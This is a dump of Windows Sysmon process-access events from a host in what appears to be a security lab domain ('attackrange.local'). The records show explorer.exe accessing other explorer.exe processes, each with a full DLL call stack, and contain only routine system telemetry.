22:53:00.379{05ADC7E1-704C-603D-4488-00000000AD01}84761872C:\Windows\explorer.exe{05ADC7E1-1E7A-603D-D07D-00000000AD01}5796C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+cfdbd|C:\Windows\System32\SHELL32.dll+d0463|C:\Windows\System32\SHELL32.dll+d0394|C:\Windows\System32\SHELL32.dll+cfc42|C:\Windows\system32\explorerframe.dll+2dcc7|C:\Windows\system32\explorerframe.dll+2c732|C:\Windows\system32\explorerframe.dll+31a40|C:\Windows\system32\explorerframe.dll+5ebf9|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\comctl32.dll+58770|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\comctl32.dll+58547|C:\Windows\system32\explorerframe.dll+cea7|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\comctl32.dll+587c9|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\comctl32.dll+58612|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\system32\DUser.dll+17b15|C:\Windows\SYSTEM32\atlthunk.dll+1026|C:\Windows\System32\USER32.dll+121e4 10341000x80000000000000001695183Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:00.379{05ADC7E1-704C-603D-4488-00000000AD01}84761872C:\Windows\explorer.exe{05ADC7E1-1E7A-603D-D07D-00000000AD01}5796C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+cfd39|C:\Windows\System32\SHELL32.dll+d0463|C:\Windows\System32\SHELL32.dll+d0394|C:\Windows\System32\SHELL32.dll+cfc42|C:\Windows\system32\explorerframe.dll+2dcc7|C:\Windows\system32\explorerframe.dll+2c732|C:\Windows\system32\explorerframe.dll+31a40|C:\Windows\system32\explorerframe.dll+5ebf9|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\comctl32.dll+58770|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\comctl32.dll+58547|C:\Windows\system32\explorerframe.dll+cea7|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\comctl32.dll+587c9|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\comctl32.dll+58612|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\system32\DUser.dll+17b15|C:\Windows\SYSTEM32\atlthunk.dll+1026|C:\Windows\System32\USER32.dll+121e4 10341000x80000000000000001695182Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:00.379{05ADC7E1-704C-603D-4488-00000000AD01}84761872C:\Windows\explorer.exe{05ADC7E1-1E7A-603D-D07D-00000000AD01}5796C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+cfd1d|C:\Windows\System32\SHELL32.dll+d0463|C:\Windows\System32\SHELL32.dll+d0394|C:\Windows\System32\SHELL32.dll+cfc42|C:\Windows\system32\explorerframe.dll+2dcc7|C:\Windows\system32\explorerframe.dll+2c732|C:\Windows\system32\explorerframe.dll+31a40|C:\Windows\system32\explorerframe.dll+5ebf9|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\comctl32.dll+58770|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\comctl32.dll+58547|C:\Windows\system32\explorerframe.dll+cea7|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\comctl32.dll+587c9|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\comctl32.dll+58612|C:\Windows\System32\USER32.dll+121e4 10341000x80000000000000001695181Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:00.379{05ADC7E1-704C-603D-4488-00000000AD01}84761872C:\Windows\explorer.exe{05ADC7E1-1E7A-603D-D07D-00000000AD01}5796C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+cfd1d|C:\Windows\System32\SHELL32.dll+d0463|C:\Windows\System32\SHELL32.dll+d0394|C:\Windows\System32\SHELL32.dll+cfc42|C:\Windows\system32\explorerframe.dll+2dcc7|C:\Windows\system32\explorerframe.dll+2c732|C:\Windows\system32\explorerframe.dll+31a40|C:\Windows\system32\explorerframe.dll+5ebf9|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\comctl32.dll+58770|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\comctl32.dll+58547|C:\Windows\system32\explorerframe.dll+cea7|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\comctl32.dll+587c9|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\comctl32.dll+58612|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b 10341000x80000000000000001695180Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:00.363{05ADC7E1-1E7A-603D-D07D-00000000AD01}57968020C:\Windows\explorer.exe{05ADC7E1-704C-603D-4488-00000000AD01}8476C:\Windows\explorer.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+aef34|C:\Windows\System32\SHELL32.dll+b0987|C:\Windows\explorer.exe+3c618|C:\Windows\explorer.exe+3c4a4|C:\Windows\explorer.exe+3c411|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001695179Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:00.352{05ADC7E1-1E7A-603D-D07D-00000000AD01}57965212C:\Windows\explorer.exe{05ADC7E1-704C-603D-4488-00000000AD01}8476C:\Windows\explorer.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+aef34|C:\Windows\System32\SHELL32.dll+b03b0|C:\Windows\System32\TwinUI.dll+12d4e1|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001695178Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:00.352{05ADC7E1-1E7A-603D-D07D-00000000AD01}57965212C:\Windows\explorer.exe{05ADC7E1-704C-603D-4488-00000000AD01}8476C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\TwinUI.dll+12d319|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001695177Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:00.352{05ADC7E1-1E7A-603D-D07D-00000000AD01}57968800C:\Windows\explorer.exe{05ADC7E1-704C-603D-4488-00000000AD01}8476C:\Windows\explorer.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+aef34|C:\Windows\System32\SHELL32.dll+b0987|C:\Windows\explorer.exe+1e03a|C:\Windows\explorer.exe+1e249|C:\Windows\explorer.exe+1df79|C:\Windows\explorer.exe+3c407|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001695176Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:00.352{05ADC7E1-1E7A-603D-D07D-00000000AD01}57968800C:\Windows\explorer.exe{05ADC7E1-704C-603D-4488-00000000AD01}8476C:\Windows\explorer.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\explorer.exe+1f054|C:\Windows\explorer.exe+1f000|C:\Windows\explorer.exe+1dfec|C:\Windows\explorer.exe+1e249|C:\Windows\explorer.exe+1df79|C:\Windows\explorer.exe+3c407|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001695175Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:00.350{05ADC7E1-704C-603D-4488-00000000AD01}84761872C:\Windows\explorer.exe{05ADC7E1-1E7A-603D-D07D-00000000AD01}5796C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+cff37|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018FEF55)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+2da4|C:\Windows\system32\DUser.dll+bebd|C:\Windows\system32\DUser.dll+bb02|C:\Windows\System32\USER32.dll+26924|C:\Windows\SYSTEM32\ntdll.dll+a9764|C:\Windows\System32\win32u.dll+10c4 10341000x80000000000000001695174Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:00.348{05ADC7E1-704C-603D-4488-00000000AD01}84761872C:\Windows\explorer.exe{05ADC7E1-1E7A-603D-D07D-00000000AD01}5796C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+cfdbd|C:\Windows\System32\SHELL32.dll+d0463|C:\Windows\System32\SHELL32.dll+d0394|C:\Windows\System32\SHELL32.dll+cfc42|C:\Windows\system32\explorerframe.dll+2dcc7|C:\Windows\system32\explorerframe.dll+2c732|C:\Windows\system32\explorerframe.dll+31a40|C:\Windows\system32\explorerframe.dll+5ebf9|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\comctl32.dll+58770|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\comctl32.dll+58547|C:\Windows\system32\explorerframe.dll+cea7|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\comctl32.dll+587c9|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\comctl32.dll+58612|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\system32\DUser.dll+17b15|C:\Windows\SYSTEM32\atlthunk.dll+1026|C:\Windows\System32\USER32.dll+121e4 10341000x80000000000000001695173Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:00.348{05ADC7E1-704C-603D-4488-00000000AD01}84761872C:\Windows\explorer.exe{05ADC7E1-1E7A-603D-D07D-00000000AD01}5796C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+cfd39|C:\Windows\System32\SHELL32.dll+d0463|C:\Windows\System32\SHELL32.dll+d0394|C:\Windows\System32\SHELL32.dll+cfc42|C:\Windows\system32\explorerframe.dll+2dcc7|C:\Windows\system32\explorerframe.dll+2c732|C:\Windows\system32\explorerframe.dll+31a40|C:\Windows\system32\explorerframe.dll+5ebf9|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\comctl32.dll+58770|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\comctl32.dll+58547|C:\Windows\system32\explorerframe.dll+cea7|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\comctl32.dll+587c9|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\comctl32.dll+58612|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\system32\DUser.dll+17b15|C:\Windows\SYSTEM32\atlthunk.dll+1026|C:\Windows\System32\USER32.dll+121e4 10341000x80000000000000001695172Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:00.348{05ADC7E1-704C-603D-4488-00000000AD01}84761872C:\Windows\explorer.exe{05ADC7E1-1E7A-603D-D07D-00000000AD01}5796C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+cfd1d|C:\Windows\System32\SHELL32.dll+d0463|C:\Windows\System32\SHELL32.dll+d0394|C:\Windows\System32\SHELL32.dll+cfc42|C:\Windows\system32\explorerframe.dll+2dcc7|C:\Windows\system32\explorerframe.dll+2c732|C:\Windows\system32\explorerframe.dll+31a40|C:\Windows\system32\explorerframe.dll+5ebf9|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\comctl32.dll+58770|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\comctl32.dll+58547|C:\Windows\system32\explorerframe.dll+cea7|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\comctl32.dll+587c9|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\comctl32.dll+58612|C:\Windows\System32\USER32.dll+121e4 10341000x80000000000000001695171Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:00.348{05ADC7E1-704C-603D-4488-00000000AD01}84761872C:\Windows\explorer.exe{05ADC7E1-1E7A-603D-D07D-00000000AD01}5796C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+cfd1d|C:\Windows\System32\SHELL32.dll+d0463|C:\Windows\System32\SHELL32.dll+d0394|C:\Windows\System32\SHELL32.dll+cfc42|C:\Windows\system32\explorerframe.dll+2dcc7|C:\Windows\system32\explorerframe.dll+2c732|C:\Windows\system32\explorerframe.dll+31a40|C:\Windows\system32\explorerframe.dll+5ebf9|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\comctl32.dll+58770|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\comctl32.dll+58547|C:\Windows\system32\explorerframe.dll+cea7|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\comctl32.dll+587c9|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\comctl32.dll+58612|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b 10341000x80000000000000001695170Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:00.332{05ADC7E1-704C-603D-4488-00000000AD01}84761872C:\Windows\explorer.exe{05ADC7E1-1E7A-603D-D07D-00000000AD01}5796C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+cff37|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018FEF55)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+2da4|C:\Windows\system32\DUser.dll+bebd|C:\Windows\system32\DUser.dll+bb02|C:\Windows\System32\USER32.dll+26924|C:\Windows\SYSTEM32\ntdll.dll+a9764|C:\Windows\System32\win32u.dll+10c4 10341000x80000000000000001695169Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:00.332{05ADC7E1-704C-603D-4488-00000000AD01}84761872C:\Windows\explorer.exe{05ADC7E1-1E7A-603D-D07D-00000000AD01}5796C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+cff37|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018FEF55)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+2da4|C:\Windows\system32\DUser.dll+bebd|C:\Windows\system32\DUser.dll+bb02|C:\Windows\System32\USER32.dll+26924|C:\Windows\SYSTEM32\ntdll.dll+a9764|C:\Windows\System32\win32u.dll+10c4 10341000x80000000000000001695168Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:00.332{05ADC7E1-704C-603D-4488-00000000AD01}84761872C:\Windows\explorer.exe{05ADC7E1-1E7A-603D-D07D-00000000AD01}5796C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+cff37|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018FEF55)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+2da4|C:\Windows\system32\DUser.dll+bebd|C:\Windows\system32\DUser.dll+bb02|C:\Windows\System32\USER32.dll+26924|C:\Windows\SYSTEM32\ntdll.dll+a9764|C:\Windows\System32\win32u.dll+10c4 10341000x80000000000000001695167Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:00.317{05ADC7E1-704C-603D-4488-00000000AD01}84761872C:\Windows\explorer.exe{05ADC7E1-1E7A-603D-D07D-00000000AD01}5796C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+cfdbd|C:\Windows\System32\SHELL32.dll+d0463|C:\Windows\System32\SHELL32.dll+d0394|C:\Windows\System32\SHELL32.dll+cfc42|C:\Windows\system32\explorerframe.dll+1b27d|C:\Windows\system32\explorerframe.dll+345ab|C:\Windows\system32\explorerframe.dll+33f04|C:\Windows\system32\explorerframe.dll+32faa|C:\Windows\system32\explorerframe.dll+3308c|C:\Windows\System32\SHELL32.dll+eca73|C:\Windows\System32\SHELL32.dll+ece74|C:\Windows\system32\DUI70.dll+27a09|C:\Windows\system32\DUI70.dll+2e18d|C:\Windows\system32\DUI70.dll+15e98|C:\Windows\system32\DUI70.dll+24d26|C:\Windows\system32\DUI70.dll+24e40|C:\Windows\system32\DUI70.dll+24e40|C:\Windows\system32\DUI70.dll+24e40|C:\Windows\system32\DUI70.dll+365bd|C:\Windows\system32\DUI70.dll+3610a 10341000x80000000000000001695166Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:00.317{05ADC7E1-704C-603D-4488-00000000AD01}84761872C:\Windows\explorer.exe{05ADC7E1-1E7A-603D-D07D-00000000AD01}5796C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+cfd39|C:\Windows\System32\SHELL32.dll+d0463|C:\Windows\System32\SHELL32.dll+d0394|C:\Windows\System32\SHELL32.dll+cfc42|C:\Windows\system32\explorerframe.dll+1b27d|C:\Windows\system32\explorerframe.dll+345ab|C:\Windows\system32\explorerframe.dll+33f04|C:\Windows\system32\explorerframe.dll+32faa|C:\Windows\system32\explorerframe.dll+3308c|C:\Windows\System32\SHELL32.dll+eca73|C:\Windows\System32\SHELL32.dll+ece74|C:\Windows\system32\DUI70.dll+27a09|C:\Windows\system32\DUI70.dll+2e18d|C:\Windows\system32\DUI70.dll+15e98|C:\Windows\system32\DUI70.dll+24d26|C:\Windows\system32\DUI70.dll+24e40|C:\Windows\system32\DUI70.dll+24e40|C:\Windows\system32\DUI70.dll+24e40|C:\Windows\system32\DUI70.dll+365bd|C:\Windows\system32\DUI70.dll+3610a 10341000x80000000000000001695165Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:00.317{05ADC7E1-704C-603D-4488-00000000AD01}84761872C:\Windows\explorer.exe{05ADC7E1-1E7A-603D-D07D-00000000AD01}5796C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+cfd1d|C:\Windows\System32\SHELL32.dll+d0463|C:\Windows\System32\SHELL32.dll+d0394|C:\Windows\System32\SHELL32.dll+cfc42|C:\Windows\system32\explorerframe.dll+1b27d|C:\Windows\system32\explorerframe.dll+345ab|C:\Windows\system32\explorerframe.dll+33f04|C:\Windows\system32\explorerframe.dll+32faa|C:\Windows\system32\explorerframe.dll+3308c|C:\Windows\System32\SHELL32.dll+eca73|C:\Windows\System32\SHELL32.dll+ece74|C:\Windows\system32\DUI70.dll+27a09|C:\Windows\system32\DUI70.dll+2e18d|C:\Windows\system32\DUI70.dll+15e98|C:\Windows\system32\DUI70.dll+24d26|C:\Windows\system32\DUI70.dll+24e40 10341000x80000000000000001695164Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:00.317{05ADC7E1-704C-603D-4488-00000000AD01}84761872C:\Windows\explorer.exe{05ADC7E1-1E7A-603D-D07D-00000000AD01}5796C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+cfd1d|C:\Windows\System32\SHELL32.dll+d0463|C:\Windows\System32\SHELL32.dll+d0394|C:\Windows\System32\SHELL32.dll+cfc42|C:\Windows\system32\explorerframe.dll+1b27d|C:\Windows\system32\explorerframe.dll+345ab|C:\Windows\system32\explorerframe.dll+33f04|C:\Windows\system32\explorerframe.dll+32faa|C:\Windows\system32\explorerframe.dll+3308c|C:\Windows\System32\SHELL32.dll+eca73|C:\Windows\System32\SHELL32.dll+ece74|C:\Windows\sys